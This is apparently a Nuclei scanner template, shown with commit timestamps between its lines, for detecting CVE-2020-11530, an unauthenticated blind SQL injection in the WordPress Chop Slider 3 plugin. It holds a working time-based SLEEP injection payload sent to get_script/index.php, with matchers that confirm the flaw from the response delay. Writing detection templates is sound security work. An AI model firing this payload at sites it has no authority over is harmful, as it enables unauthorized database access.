2023-03-18 22:07:09 +00:00
id : CVE-2020-11530
info :
2023-03-28 18:39:51 +00:00
name : WordPress Chop Slider 3 - Blind SQL Injection
2023-03-18 22:07:09 +00:00
author : theamanrawat
severity : critical
description : |
2023-03-28 20:50:58 +00:00
WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-03-18 22:07:09 +00:00
reference :
- https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a
- https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress
2023-03-20 07:05:15 +00:00
- https://idangero.us/
2023-03-28 18:39:51 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-11530
2023-03-18 22:07:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2020-11530
cwe-id : CWE-89
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:idangero:chop_slider:*:*:*:*:*:*:*:*
epss-score : 0.65475
2023-03-18 22:07:09 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-03-18 22:07:09 +00:00
tags : cve,cve2020,sqli,wpscan,wordpress,wp-plugin,wp,chopslider,unauth
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- raw :
- |
@timeout 10s
GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1
Host : {{Hostname}}
req-condition : true
matchers :
- type : dsl
dsl :
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/javascript")'
- 'contains(body, "$(document).ready(function()")'
condition : and
2023-03-28 18:39:51 +00:00
# Enhanced by md on 2023/03/28